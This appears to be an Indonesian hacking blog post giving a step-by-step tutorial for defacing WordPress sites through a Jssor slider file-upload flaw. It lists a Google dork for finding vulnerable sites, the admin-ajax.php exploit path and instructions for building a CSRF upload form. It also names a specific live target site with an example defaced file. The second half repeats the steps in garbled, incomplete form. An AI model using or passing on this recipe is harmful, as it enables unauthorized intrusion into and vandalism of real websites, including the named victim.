Friday, May 22, 2020
Yow Halo Exploiter, kali ini saya akan membagikan tutorial deface metode Wordpress Json Slider Upload File Vulnerability, caranya simpel, ok langsung saja ke intinya.
#Google Dork : inurl:/wp-content/jssor-slider/jssor-uploads/
#Exploit : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# CSRF : Klik Ini
#Live Target : http://maxduhanov.ru
2. setelah itu masukkan exploit di akhir domain target.com/[EXPLOIT], contoh : http://maxduhanov.ru/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
3. jika seperti ini berarti vuln
4. setelah itu kalian copy csrf yg ada di atas, lalu save dengan extensi .html jangan lupa untuk menaruh target kalian beserta exploit di bagian action=""
contoh :
5 jika sudah, buka csrf kalian di browser dan upload script deface kalian.
6. jika muncul tanda seperti awal ( liat nomor 2 ), berarti sukses ter upload, lalu akses hasil deface kalian : http://target.com/wp-content/jssor-slider/jssor-uploads/ScDefaceKamu.html
Contoh : http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/0wn.htm
7. dan boom !!
Ok itu saja yg bisa saya sampaikan, jangan lupa juga untuk melihat tutorial deface lainnya
semoga bermanfaat dan jangan lupa untuk share artikel ini :D
#Google Dork : inurl:/wp-content/jssor-slider/jssor-uploads/
#Exploit : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# CSRF : Klik Ini
#Live Target : http://maxduhanov.ru
Langkah-Langkah
1. dorking terlebih dahulu, atau gunakan live target di atas2. setelah itu masukkan exploit di akhir domain target.com/[EXPLOIT], contoh : http://maxduhanov.ru/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
3. jika seperti ini berarti vuln
contoh :
5 jika sudah, buka csrf kalian di browser dan upload script deface kalian.
Contoh : http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/0wn.htm
7. dan boom !!
Ok itu saja yg bisa saya sampaikan, jangan lupa juga untuk melihat tutorial deface lainnya
semoga bermanfaat dan jangan lupa untuk share artikel ini :D